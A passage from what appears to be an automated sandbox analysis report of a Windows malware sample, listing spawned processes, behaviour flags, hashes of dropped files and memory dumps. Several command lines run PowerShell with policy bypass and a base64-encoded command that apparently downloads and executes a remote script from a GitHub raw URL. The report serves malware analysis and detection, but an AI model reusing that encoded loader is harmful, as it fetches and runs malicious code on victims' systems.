C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES2541.tmpMD5
964caa4f02b9565510e15c5ea910775e
SHA15edbecc35dc0f60ac7bdc585f9fd5cfa01a1a4c1
SHA25691046f2ea431347ad3b742a063d6e121b4c31f5178249270eb5af85d36a2df13
SHA512bb157a5259ed96e04cf46d97aed788e267351e2be6c13b0a6209add182d56d314813bb02f8ebbc41ac3f9ba288fc5dd6604930be0ac118bf6c97366193e99559
-
C:\Users\Admin\AppData\Local\Temp\Setup.zipMD5
36f178576dcb8db35d6f06448b1eb510
SHA162277c90cc2b1bb81b36571037afe5081b0605d5
SHA256192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
SHA5129e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
43473f4e719958639a9d89e5d8388999
SHA1ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA5121051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
C:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.dllMD5
471bdee090cb60e599f4a2d690d48217
SHA1d368e433a07f421a88241b7481c80c3fc223759a
SHA256a2e1a1b98b89f933e167713e797115e8abbe36e1442a439b3818fb54bd2bacf8
SHA512da02b03573279cf5208d2386a44a87bd6c1c04f0b549d381952898e4463f290aa9d1f6259d15a5d60208e36041dbdea8c68f0475993ed8e1f84311e738342fe5
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.configMD5
ad0967a0ab95aa7d71b3dc92b71b8f7a
SHA1ed63f517e32094c07a2c5b664ed1cab412233ab5
SHA2569c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc
SHA51285766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b
-
\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\CSCB76A0FB192CC42A6896CCCC69F92E773.TMPMD5
d003565ffac3c9d41df58b063e7ba3a0
SHA128134aeacf9867ce14300ff2376923de29161616
SHA256b994ca66addbbc61e7c9959f17e3afac0132a32ced45e809f53ef993635d1363
SHA512387c39aaf40125af803871e744970bcd2fa357a9e642b8d8a98f7e01ef128eab58543a4e1aa5d3540d2fbfc69c1d9c98c957eb5e2dce8a09dcab3ff3fcf3163d
-
\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.cmdlineMD5
1bf5abca04dfa636d13c54b3fa9b3e86
SHA186b76191802aedaec09c009c39ed93fbcbea82c4
SHA25677191771e93606772bdcd1707b337d80a76c7346ea0753d8d5ee2a98607d0826
SHA512a295f20c3dc2a4dd18acb880940599ac275be1d4261e75c1b7ae2fee0fb28c6e65f23185e1f65179ac3467dd72769e4cc0ef2039cfc7b758aa6f355e0c1444bc
-
\Windows\Branding\mediasrv.pngMD5
271eacd9c9ec8531912e043bc9c58a31
SHA1c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA51287375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
-
\Windows\Branding\mediasvc.pngMD5
1fa9c1e185a51b6ed443dd782b880b0d
SHA150145abf336a196183882ef960d285bd77dd3490
SHA256f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA51216bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc
-
memory/2396-119-0x0000000000000000-mapping.dmp
-
memory/2412-128-0x00000192D1BC5000-0x00000192D1BC6000-memory.dmpFilesize
4KB
-
memory/2412-129-0x00000192D1BC6000-0x00000192D1BC7000-memory.dmpFilesize
4KB
-
memory/2412-127-0x00000192D1BC3000-0x00000192D1BC5000-memory.dmpFilesize
8KB
-
memory/2412-124-0x00000192D1E90000-0x00000192D213A000-memory.dmpFilesize
2.7MB
-
memory/2412-123-0x00000192D1BC0000-0x00000192D1BC2000-memory.dmpFilesize
8KB
-
memory/2412-118-0x0000000000000000-mapping.dmp
-
memory/2460-151-0x0000000000000000-mapping.dmp
-
memory/2684-358-0x0000000000000000-mapping.dmp
-
memory/3292-145-0x0000020B75CE3000-0x0000020B75CE5000-memory.dmpFilesize
8KB
-
memory/3292-167-0x0000020B76760000-0x0000020B76761000-memory.dmpFilesize
4KB
-
memory/3292-144-0x0000020B75F70000-0x0000020B75F71000-memory.dmpFilesize
4KB
-
memory/3292-134-0x0000000000000000-mapping.dmp
-
memory/3292-143-0x0000020B75CE0000-0x0000020B75CE2000-memory.dmpFilesize
8KB
-
memory/3292-166-0x0000020B763D0000-0x0000020B763D1000-memory.dmpFilesize
4KB
-
memory/3292-158-0x0000020B75C90000-0x0000020B75C91000-memory.dmpFilesize
4KB
-
memory/3292-139-0x0000020B75C40000-0x0000020B75C41000-memory.dmpFilesize
4KB
-
memory/3292-160-0x0000020B75CE6000-0x0000020B75CE8000-memory.dmpFilesize
8KB
-
memory/3292-165-0x0000020B75CE8000-0x0000020B75CE9000-memory.dmpFilesize
4KB
-
memory/3500-142-0x0000000003140000-0x0000000003142000-memory.dmpFilesize
8KB
-
memory/3500-130-0x0000000000000000-mapping.dmp
-
memory/3612-360-0x0000000000000000-mapping.dmp
-
memory/3700-359-0x0000000000000000-mapping.dmp
-
memory/3904-117-0x0000000005C00000-0x0000000005C01000-memory.dmpFilesize
4KB
-
memory/3904-114-0x0000000000C90000-0x0000000000C91000-memory.dmpFilesize
4KB
-
memory/3904-116-0x0000000005BC0000-0x0000000005BF1000-memory.dmpFilesize
196KB
-
memory/3960-357-0x0000000000000000-mapping.dmp
-
memory/3972-154-0x0000000000000000-mapping.dmp
-
memory/4000-463-0x0000000000000000-mapping.dmp
-
memory/4000-369-0x0000000000000000-mapping.dmp
-
memory/4028-174-0x0000000000000000-mapping.dmp
-
memory/4028-223-0x0000021D06648000-0x0000021D0664A000-memory.dmpFilesize
8KB
-
memory/4028-184-0x0000021D06643000-0x0000021D06645000-memory.dmpFilesize
8KB
-
memory/4028-183-0x0000021D06640000-0x0000021D06642000-memory.dmpFilesize
8KB
-
memory/4028-203-0x0000021D06646000-0x0000021D06648000-memory.dmpFilesize
8KB
-
memory/4112-361-0x0000000000000000-mapping.dmp
-
memory/4124-362-0x0000000000000000-mapping.dmp
-
memory/4144-224-0x000001BE87CD0000-0x000001BE87CD2000-memory.dmpFilesize
8KB
-
memory/4144-267-0x000001BE87CD8000-0x000001BE87CDA000-memory.dmpFilesize
8KB
-
memory/4144-225-0x000001BE87CD3000-0x000001BE87CD5000-memory.dmpFilesize
8KB
-
memory/4144-216-0x0000000000000000-mapping.dmp
-
memory/4144-266-0x000001BE87CD6000-0x000001BE87CD8000-memory.dmpFilesize
8KB
-
memory/4148-368-0x0000000000000000-mapping.dmp
-
memory/4164-462-0x0000000000000000-mapping.dmp
-
memory/4216-367-0x0000000000000000-mapping.dmp
-
memory/4308-365-0x0000000000000000-mapping.dmp
-
memory/4328-366-0x0000000000000000-mapping.dmp
-
memory/4404-269-0x00000201FE4A0000-0x00000201FE4A2000-memory.dmpFilesize
8KB
-
memory/4404-301-0x00000201FE4A6000-0x00000201FE4A8000-memory.dmpFilesize
8KB
-
memory/4404-270-0x00000201FE4A3000-0x00000201FE4A5000-memory.dmpFilesize
8KB
-
memory/4404-254-0x0000000000000000-mapping.dmp
-
memory/4404-302-0x00000201FE4A8000-0x00000201FE4AA000-memory.dmpFilesize
8KB
-
memory/4428-370-0x0000000000000000-mapping.dmp
-
memory/4504-376-0x0000000000000000-mapping.dmp
-
memory/4508-375-0x0000000000000000-mapping.dmp
-
memory/4532-371-0x0000000000000000-mapping.dmp
-
memory/4552-372-0x0000000000000000-mapping.dmp
-
memory/4620-373-0x0000000000000000-mapping.dmp
-
memory/4644-374-0x0000000000000000-mapping.dmp
-
memory/4708-378-0x0000000000000000-mapping.dmp
-
memory/4752-377-0x0000000000000000-mapping.dmp
-
memory/4824-312-0x0000000000000000-mapping.dmp
-
memory/4844-313-0x0000000000000000-mapping.dmp
-
memory/4856-379-0x0000000000000000-mapping.dmp
-
memory/4864-314-0x0000000000000000-mapping.dmp
-
memory/4880-395-0x000001BBB9EA6000-0x000001BBB9EA8000-memory.dmpFilesize
8KB
-
memory/4880-380-0x0000000000000000-mapping.dmp
-
memory/4880-391-0x000001BBB9EA0000-0x000001BBB9EA2000-memory.dmpFilesize
8KB
-
memory/4880-392-0x000001BBB9EA3000-0x000001BBB9EA5000-memory.dmpFilesize
8KB
-
memory/4880-446-0x000001BBB9EA8000-0x000001BBB9EA9000-memory.dmpFilesize
4KB
-
memory/5044-351-0x0000000000000000-mapping.dmp
-
memory/5064-352-0x0000000000000000-mapping.dmp
-
memory/5096-355-0x0000000000000000-mapping.dmp
-
memory/5112-356-0x0000000000000000-mapping.dmp